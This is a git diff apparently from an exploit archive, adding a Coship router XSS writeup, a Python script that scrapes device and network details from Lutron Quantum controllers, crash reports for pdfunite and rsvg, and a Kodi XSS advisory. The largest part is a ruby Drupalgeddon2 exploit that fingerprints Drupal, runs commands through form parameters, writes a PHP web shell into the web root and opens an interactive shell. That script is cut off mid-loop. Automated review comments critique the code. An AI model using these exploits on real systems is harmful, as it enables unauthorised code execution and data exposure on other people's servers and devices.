diff --git a/exploits/hardware/webapps/44320.txt b/exploits/hardware/webapps/44320.txt
new file mode 100644
index 000000000..09a3261f6
--- /dev/null
+++ b/exploits/hardware/webapps/44320.txt
@@ -0,0 +1,26 @@
+######################################################################################
+# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS)
+# Date: 2018-03-18
+# Exploit Author: Sayan Chatterjee
+# Vendor Homepage: http://en.coship.com/
+# Category: Hardware (Wifi Router)
+# Version: 4.0.0.48
+# Tested on: Windows 10
+# CVE: CVE-2018-8772
+#######################################################################################
+
+Proof of Concept
+=================
+URL: http://192.168.1.254 (Wifi Router Gateway)
+Attack Vector : Network Name(SSID)
+Payload :
+
+Reproduction Steps:
+------------------------------
+1. Access the wifi router gateway [i.e, http://192.168.1.254]
+2. Go to "Wireless Setting" -> "Basic"
+3. Update "Network Name(SSID)" field with ''
+4. Save the settings.
+5. Go to "System Status" and you will be having "S@Y@N" popup.
+
+#######################################################################################
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44488.py b/exploits/hardware/webapps/44488.py
new file mode 100755
index 000000000..5dabe1804
--- /dev/null
+++ b/exploits/hardware/webapps/44488.py
@@ -0,0 +1,69 @@
+'''
+
+# Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware
+# Date: 20-03-2018
+# Exploit Author: David Castro
+# Contact: https://twitter.com/SadFud75
+# Vendor Homepage: http://www.lutron.com
+# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx
+# Version: Lutron Quantum 2.0 - 3.2.243 firmware
+# CVE : CVE-2018-8880
+# Shodan dork: html:"
LUTRON
"
+
+Python 2.7 Output:
+
+Leaking data from HOST
+[+] Device info:
+
+MAC: 000FE702A999
+PRODUCT FAMILY: Gulliver
+PRODUCT TYPE: Processor
+SERIAL NUMBER: 007B24B4
+GUID: 0DFB959BD0D8784DA9501B958F099779
+CODE VERSION: 7.5.0
+
+[+] Network info:
+
+INTERNAL IP: 192.168.0.2
+SUBNET MASK: 255.255.255.0
+GATEWAY: 192.168.0.1
+TELNET PORT: 23
+FTP PORT: 21
+REMOTE PORT: 51023
+
+[+] Done.
+
+'''
+
+
+import requests
+from bs4 import BeautifulSoup
+
+ip = raw_input("Enter target ip: ")
+port = raw_input("Enter target port: ")
+
+print 'Leaking data from ' + 'http://' + ip + ":" + port
+r = requests.get('http://' + ip + ":" + port + '/deviceIP')
+resultado = r.text
+parseado = BeautifulSoup(resultado, "lxml")
+
+print '[+] Device info:'
+print ''
+print 'MAC: ' + parseado.find('input', {'name': 'MacAddr'}).get('value')
+print 'PRODUCT FAMILY: ' + parseado.find('input', {'name': 'PRODFAM'}).get('value')
+print 'PRODUCT TYPE: ' + parseado.find('input', {'name': 'PRODTYPE'}).get('value')
+print 'SERIAL NUMBER: ' + parseado.find('input', {'name': 'SERNUM'}).get('value')
+print 'GUID: ' + parseado.find('input', {'name': 'GUID'}).get('value')
+print 'CODE VERSION: ' + parseado.find('input', {'name': 'CODEVER'}).get('value')
+print ''
+print '[+] Network info:'
+print ''
+print 'INTERNAL IP: ' + parseado.find('input', {'name': 'IPADDR'}).get('value')
+print 'SUBNET MASK: ' + parseado.find('input', {'name': 'SUBNETMK'}).get('value')
+print 'GATEWAY: ' + parseado.find('input', {'name': 'GATEADDR'}).get('value')
+print 'TELNET PORT: ' + parseado.find('input', {'name': 'TELPORT'}).get('value')
+print 'FTP PORT: ' + parseado.find('input', {'name': 'FTPPORT'}).get('value')
+print 'REMOTE PORT: ' + parseado.find('input', {'name': 'REMOTEPORT'}).get('value')
+print ''
+print '[+] Done.'
+print ''
\ No newline at end of file
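Review bot: Every `parseado.find('input', {...})` on lines 93–107 returns None when the named field is absent from the response, so the chained `.get('value')` raises AttributeError and the rest of the report is never printed; a three-line accessor that does `tag = parseado.find('input', {'name': name})` and returns `tag.get('value') if tag else 'N/A'` keeps the output complete for partial pages. The `requests.get` on line 87 carries no `timeout=` and the result is parsed without `raise_for_status()`, so an unreachable host hangs the script and an error page is scraped as if it were the device form; `r = requests.get(url, timeout=10)` followed by `r.raise_for_status()` covers both. The script is Python 2 only (`raw_input`, `print` statements), which the docstring's "Python 2.7 Output" implies but the header does not state; a `# Requires: Python 2.7` line would save readers a failed run. The sample output in the module docstring (lines 59–63) prints what look like a real MAC address, serial number and GUID; replacing them with a `[REDACTED]` placeholder is the usual courtesy in a public PoC.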
diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt
new file mode 100644
index 000000000..3599abc0c
--- /dev/null
+++ b/exploits/linux/dos/44490.txt
@@ -0,0 +1,68 @@
+# Exploit Title: PDFunite Malformed pdf buffer overflow
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: https://launchpad.net/ubuntu/artful/+package/poppler-utils
+# Software Link: https://launchpad.net/ubuntu/+source/poppler/0.57.0-2ubuntu4.2
+# Version: 0.41.0
+# Tested on: Ubuntu
+# CVE :
+
+pdfunite is a part of poppler package in ubuntu. pdfunite is prone to a
+local bufferoverflow when a malformed pdf is used to unite with another
+pdf.
+Following is the gdb stack trace:
+
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#0 0x00007ffff7abf948 in XRef::getEntry(int, bool) () from
+/usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#1 0x00007ffff7aa8867 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#2 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#3 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#4 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#5 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#6 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#7 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#8 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#9 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#10 0x00007ffff7aa8bae in PDFDoc::markPageObjects(Dict*, XRef*, XRef*,
+unsigned int, int, int, std::set,
+std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58
+#11 0x000000000040271a in ?? ()
+#12 0x00007ffff722d830 in __libc_start_main (main=0x401b20, argc=4,
+argv=0x7fffffffe0b8, init=, fini=,
+rtld_fini=, stack_end=0x7fffffffe0a8) at
+../csu/libc-start.c:291
+#13 0x0000000000403179 in ?? ()
+
+
+$ pdfunite -v
+pdfunite version 0.41.0
+
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip
\ No newline at end of file
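Review bot: The title on line 118 classifies the crash as a buffer overflow, but the only evidence in the file is a SIGSEGV inside `XRef::getEntry` (lines 134–138), which establishes a crash and nothing more about its class; an ASan or Valgrind report (or a sentence explaining how the overflow was confirmed) would substantiate the title, otherwise "segmentation fault" is the defensible wording. The `# Version:` header on line 123 says 0.41.0 and matches the `pdfunite -v` output on line 178, yet the `# Software Link:` on line 122 points at the poppler 0.57.0-2ubuntu4.2 package and `# Tested on:` gives only `Ubuntu` with no release, so a reader cannot tell which build was actually crashed. The `# CVE :` field on line 125 is blank; stating explicitly that no identifier was assigned is clearer than an empty field.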
diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt
new file mode 100644
index 000000000..1dd65fabb
--- /dev/null
+++ b/exploits/multiple/dos/44491.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Buffer-overflow in RSVG while converting a malformed svg
+# Date: 17 April 2018
+# Exploit Author: Hamm3r.py
+# Vendor Homepage: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Software Link: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin
+# Version: Ubuntu: 2.40.13 (Default version that is shipped with ubuntu) and MAC 2.42.2
+# Tested on: Ubuntu 16.04 and MAC 10.13.3
+
+
+RSVG throws a segmentation fault when malformed SVG is submitted as input.
+
+Steps to reproduce:
+rsvg test.png
+
+
+GDB Stacktrace below:
+Starting program: /usr/bin/rsvg fuzzed_fdiA0xdf5OQPYsN hello.png
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Program received signal SIGSEGV, Segmentation fault.
+_fill_xrgb32_lerp_opaque_spans (abstract_renderer=0x7fffffffbea0, y=18219,
+h=1, spans=,
+num_spans=) at
+../../../../src/cairo-image-compositor.c:2249
+2249 ../../../../src/cairo-image-compositor.c: No such file or directory.
+(gdb) backtrace
+#0 0x00007ffff6fd35c0 in _fill_xrgb32_lerp_opaque_spans
+(abstract_renderer=0x7fffffffbea0, y=18219, h=1, spans=,
+num_spans=) at ../../../../src/cairo-image-compositor.c:2249
+#1 0x00007ffff7017921 in _cairo_tor_scan_converter_generate (xmax=248,
+xmin=192, height=1, y=18219, spans=0x63e438, renderer=0x7fffffffbea0,
+cells=)
+at ../../../../src/cairo-tor-scan-converter.c:1643
+#2 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(renderer=0x7fffffffbea0, antialias=1, winding_mask=,
+converter=) at
+../../../../src/cairo-tor-scan-converter.c:1794
+#3 0x00007ffff7017921 in _cairo_tor_scan_converter_generate
+(converter=0x63d3b0, renderer=0x7fffffffbea0)
+at ../../../../src/cairo-tor-scan-converter.c:1857
+#4 0x00007ffff7009c33 in composite_polygon
+(extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360,
+fill_rule=fill_rule@entry=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT,
+compositor=0x7ffff72b2040 , compositor=0x7ffff72b2040 )
+at ../../../../src/cairo-spans-compositor.c:801
+#5 0x00007ffff700a6a5 in clip_and_composite_polygon
+(compositor=compositor@entry=0x7ffff72b2040 ,
+extents=extents@entry=0x7fffffffd780,
+polygon=polygon@entry=0x7fffffffd360, fill_rule=CAIRO_FILL_RULE_WINDING,
+antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:967
+#6 0x00007ffff700b5d3 in _cairo_spans_compositor_fill
+(_compositor=0x7ffff72b2040 , extents=0x7fffffffd780,
+path=, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT) at
+../../../../src/cairo-spans-compositor.c:1174
+#7 0x00007ffff6fc5a90 in _cairo_compositor_fill (compositor=0x7ffff72b2040
+, surface=0x6399a0, op=, source=,
+path=0x639768, fill_rule=CAIRO_FILL_RULE_WINDING,
+tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0)
+at ../../../../src/cairo-compositor.c:203
+#8 0x00007ffff6fd7127 in _cairo_image_surface_fill
+(abstract_surface=, op=, source=, path=, fill_rule=, tolerance=, antialias=, clip=0x0) at
+../../../../src/cairo-image-surface.c:985
+#9 0x00007ffff700e7d7 in _cairo_surface_fill (surface=0x6399a0,
+op=CAIRO_OPERATOR_OVER, source=0x7fffffffdb50, path=0x639768,
+fill_rule=CAIRO_FILL_RULE_WINDING, tolerance=0.10000000000000001,
+antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) at
+../../../../src/cairo-surface.c:2341
+#10 0x00007ffff6fce14c in _cairo_gstate_fill (gstate=0x630c00,
+path=path@entry=0x639768)
+at ../../../../src/cairo-gstate.c:1317
+#11 0x00007ffff6fc7279 in _cairo_default_context_fill (abstract_cr=0x639400)
+at ../../../../src/cairo-default-context.c:1055
+#12 0x00007ffff6fc02b5 in cairo_fill (cr=0x639400) at
+../../../../src/cairo.c:2205
+#13 0x00007ffff7bc9e95 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#14 0x00007ffff7bc6272 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#15 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#16 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#17 0x00007ffff7bbd982 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#18 0x00007ffff7bbe298 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+#19 0x00007ffff7bca9e3 in rsvg_handle_render_cairo_sub () at
+/usr/lib/x86_64-linux-gnu/librsvg-2.so.2
+
+
+Version:
+$rsvg-convert --version
+rsvg-convert version 2.42.2
+
+#This issue is identified by Hamm3r.py, a general purpose fuzzer!
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip
\ No newline at end of file
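Review bot: The reproduction step on line 205, `rsvg test.png`, does not match the invocation the trace was taken from on line 209 (`/usr/bin/rsvg fuzzed_... hello.png`, an SVG input followed by a PNG output), and the version check on lines 283–284 runs `rsvg-convert`, a different binary from the `rsvg` that crashed; the steps should name the input file and the same tool the trace shows. As with the companion poppler report, the title's "buffer-overflow" is not established by a bare SIGSEGV in `_fill_xrgb32_lerp_opaque_spans` (line 214); a sanitizer report would support the classification, otherwise "segmentation fault" is what the evidence shows. The stray `*` before the two URLs on lines 196–197 looks like a paste artifact.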
diff --git a/exploits/multiple/webapps/44487.txt b/exploits/multiple/webapps/44487.txt
new file mode 100644
index 000000000..a1267a293
--- /dev/null
+++ b/exploits/multiple/webapps/44487.txt
@@ -0,0 +1,82 @@
+=============================================
+MGC ALERT 2018-003
+- Original release date: March 19, 2018
+- Last revised: April 16, 2018
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,8/10 (CVSS Base Score)
+- CVE-ID: CVE-2018-8831
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Kodi <= 17.6 - Persistent Cross-Site Scripting
+
+II. BACKGROUND
+-------------------------
+Kodi (formerly XBMC) is a free and open-source media player software
+application developed by the XBMC Foundation, a non-profit technology
+consortium. Kodi is available for multiple operating systems and hardware
+platforms, with a software 10-foot user interface for use with televisions
+and remote controls.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Persistent XSS vulnerability in the web interface of
+Kodi, that allows the execution of arbitrary HTML/script code to be
+executed in the context of the victim user's browser.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Go to: Playlist -> Create
+
+Create a playlist injecting javascript code:
+
+
+
+The XSS is executed, in the victim browser.
+
+V. BUSINESS IMPACT
+-------------------------
+An attacker can execute arbitrary HTML or script code in a targeted user's
+browser, this can leverage to steal sensitive information as user
+credentials, personal data, etc.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Kodi <= 17.6
+
+VII. SOLUTION
+-------------------------
+Vendor include the fix:
+https://trac.kodi.tv/ticket/17814
+
+VIII. REFERENCES
+-------------------------
+https://kodi.tv/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+March 19, 2018 1: Initial release
+April 16, 2018 2: Last revision
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
+March 19, 2018 2: Send to vendor
+March 30, 2018 3: Vendo fix
+April 16, 2018 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
index b9a1bda11..e476524c6 100755
--- a/exploits/php/webapps/44449.rb
+++ b/exploits/php/webapps/44449.rb
@@ -1,27 +1,10 @@
#!/usr/bin/env ruby
#
-# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/)
-# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/)
-# Hans Topo ~ https://github.com/dreadlocked
-# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
+# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
-# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002
-# Vulnerable Versions:
-# < 7.58
-# 8.x < 8.3.9
-# 8.4.x < 8.4.6 (TESTED)
-# 8.5.x < 8.5.1 (TESTED)
-#
-# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/
-# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render)
-# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user//edit [requires auth] - mail - #lazy_builder)
-# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render)
-# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render)
-# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render)
-# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
-#
-#
-# Drupal Version ~ https://example.com/CHANGELOG.txt
+# Authors:
+# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
+# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
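Review bot: The rewritten header on line 392 folds the version list into the title but drops the vendor advisory link and the per-version `(TESTED)` markers that the removed lines carried, so a reader no longer knows which of the listed versions were actually verified; keeping one `# Advisory ~ https://www.drupal.org/sa-core-2018-002` line and a `(TESTED)` note beside the verified versions preserves that provenance at no cost.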
@@ -29,114 +12,297 @@ require 'base64'
require 'json'
require 'net/http'
require 'openssl'
+require 'readline'
-# Proxy information (nil to disable)
+# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
-# Quick how to use
-if ARGV.empty?
- puts "Usage: ruby drupalggedon2.rb "
- puts " ruby drupalgeddon2.rb https://example.com whoami"
- exit
+# Settings - General
+$useragent = "drupalgeddon2"
+webshell = "s.php"
+writeshell = true
+
+
+# Settings - Payload (we could just be happy without this, but we can do better!)
+#bashcmd = "'
+bashcmd = "&1' ); }"
+bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Function http_post [post]
+def http_post(url, payload="")
+ uri = URI(url)
+ request = Net::HTTP::Post.new(uri.request_uri)
+ request.initialize_http_header({"User-Agent" => $useragent})
+ request.body = payload
+ return $http.request(request)
end
+
+# Function gen_evil_url
+def gen_evil_url(evil, feedback=true)
+ # PHP function to use (don't forget about disabled functions...)
+ phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
+
+ #puts "[*] PHP cmd: #{phpmethod}" if feedback
+ puts "[*] Payload: #{evil}" if feedback
+
+ ## Check the version to match the payload
+ # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
+ if $drupalverion.start_with?('8')
+ # Method #1 - Drupal 8, mail, #post_render - response is 200
+ url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
+
+ # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
+ #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+ #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
+ elsif $drupalverion.start_with?('7')
+ # Method #3 - Drupal 7, name, #post_render - response is 200
+ url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
+ payload = "form_id=user_pass&_triggering_element_name=name"
+ else
+ puts "[!] Unsupported Drupal version"
+ exit
+ end
+
+ # Drupal v7 needs an extra value from a form
+ if $drupalverion.start_with?('7')
+ response = http_post(url, payload)
+
+ form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
+ puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
+
+ #url = $target + "file/ajax/name/%23value/" + form_build_id
+ url = $target + "?q=file/ajax/name/%23value/" + form_build_id
+ payload = "form_build_id=" + form_build_id
+ end
+
+ return url, payload
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Quick how to use
+if ARGV.empty?
+ puts "Usage: ruby drupalggedon2.rb "
+ puts " ruby drupalgeddon2.rb https://example.com"
+ exit
+end
# Read in values
-target = ARGV[0]
-command = ARGV[1]
+$target = ARGV[0]
+
+
+# Check input for protocol
+if not $target.start_with?('http')
+ $target = "http://#{target}"
+end
+# Check input for the end
+if not $target.end_with?('/')
+ $target += "/"
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
+puts "[*] Target : #{$target}"
+puts "[*] Write? : Skipping writing web shell" if not writeshell
+puts "-"*80
-# Check input for protocol
-if not target.start_with?('http')
- target = "http://" + target
-end
-
-# Check input for the end
-if not target.end_with?('/')
- target += "/"
-end
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-# Payload
-#evil = 'uname -a'
-evil = ''
-evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php"
+# Setup connection
+uri = URI($target)
+$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-# PHP function to use
-phpmethod = 'exec'
-
-
-# Feedback
-puts "[*] Target : " + target
-puts "[*] Command: " + command
-puts "[*] PHP cmd: " + phpmethod
-
-
-# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
-#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
-
-
-# Method #2 - mail & post_render - response is 200
-url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
-# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render
-payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
-
-
-uri = URI(url)
-http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
-
# Use SSL/TLS if needed
-if uri.scheme == 'https'
- http.use_ssl = true
- http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+if uri.scheme == "https"
+ $http.use_ssl = true
+ $http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+end
+
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+# Try and get version
+$drupalverion = nil
+# Possible URLs
+url = [
+ $target + "CHANGELOG.txt",
+ $target + "core/CHANGELOG.txt",
+ $target + "includes/bootstrap.inc",
+ $target + "core/includes/bootstrap.inc",
+]
+# Check all
+url.each do|uri|
+ # Check response
+ response = http_post(uri)
+
+ if response.code == "200"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Patched already?
+ puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
+
+ # Try and get version from the file contents
+ $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
+
+ # If not, try and get it from the URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
+
+ # Done!
+ break
+ elsif response.code == "403"
+ puts "[+] Found : #{uri} (#{response.code})"
+
+ # Get version from URL
+ $drupalverion = uri.match(/core/)? "8.x" : "7.x"
+ else
+ puts "[!] MISSING: #{uri} (#{response.code})"
+ end
end
-# Make the request
-req = Net::HTTP::Post.new(uri.request_uri)
-req.body = payload
# Feedback
-puts "[*] Payload: " + evil
-#puts "[*] Sending: " + payload
-puts "-"*80
-
-
-# Check response
-response = http.request(req)
-if response.code == "200"
- puts "[+] Target seems to be exploitable! w00hooOO!"
- puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] )
+if $drupalverion
+ status = $drupalverion.end_with?('x')? "?" : "!"
+ puts "[+] Drupal#{status}: #{$drupalverion}"
else
- puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code
- #exit
+ puts "[!] Didn't detect Drupal version"
+ puts "[!] Forcing Drupal v8.x attack"
+ $drupalverion = "8.x"
end
-
-
-# Feedback
-puts "-"*80
-puts "[*] curl '" + target + "s.php?c=#{command}'"
puts "-"*80
-# Now run our command
-exploit_uri = URI(target + "s.php?c=#{command}")
-# Check response
-response = Net::HTTP.get_response(exploit_uri)
-if response.code != "200"
- puts "[!] Exploit FAILED ~ Response: " + response.code
+
+# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+
+# Make a request, testing code execution
+puts "[*] Testing: Code Execution"
+# Generate a random string to see if we can echo it
+random = (0...8).map { (65 + rand(26)).chr }.join
+url, payload = gen_evil_url("echo #{random}")
+response = http_post(url, payload)
+if response.code == "200" and not response.body.empty?
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
+else
+ puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
+puts "-"*80
-# Result
-puts "[+] Output: " + response.body
\ No newline at end of file
+# Location of web shell & used to signal if using PHP shell
+webshellpath = nil
+prompt = "drupalgeddon2"
+# Possibles paths to try
+paths = [
+ "./",
+ "./sites/default/",
+ "./sites/default/files/",
+]
+# Check all
+paths.each do|path|
+ puts "[*] Testing: File Write To Web Root (#{path})"
+
+ # Merge locations
+ webshellpath = "#{path}#{webshell}"
+
+ # Final command to execute
+ cmd = "#{bashcmd} | tee #{webshellpath}"
+
+ # Generate evil URLs
+ url, payload = gen_evil_url(cmd)
+ # Make the request
+ response = http_post(url, payload)
+ # Check result
+ if response.code == "200" and not response.body.empty?
+ # Feedback
+ #result = JSON.pretty_generate(JSON[response.body])
+ result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
+ puts "[+] Result : #{result}"
+
+ # Test to see if backdoor is there (if we managed to write it)
+ response = http_post("#{$target}#{webshellpath}", "c=hostname")
+ if response.code == "200" and not response.body.empty?
+ puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
+ break
+ else
+ puts "[!] Target is NOT exploitable. No write access here!"
+ end
+ else
+ puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
+ end
+ webshellpath = nil
+end if writeshell
+puts "-"*80 if writeshell
+
+if webshellpath
+ # Get hostname for the prompt
+ prompt = response.body.to_s.strip
+
+ # Feedback
+ puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
+elsif writeshell
+ puts "[!] FAILED to find writeable folder"
+ puts "[*] Dropping back to ugly shell..."
+end
+
+
+# Stop any CTRL + C action ;)
+trap("INT", "SIG_IGN")
+
+
+# Forever loop
+loop do
+ # Default value
+ result = "ERROR"
+
+ # Get input
+ command = Readline.readline("#{prompt}>> ", true).to_s
+
+ # Exit
+ break if command =~ /exit/
+
+ # Blank link?
+ next if command.empty?
+
+ # If PHP shell
+ if webshellpath
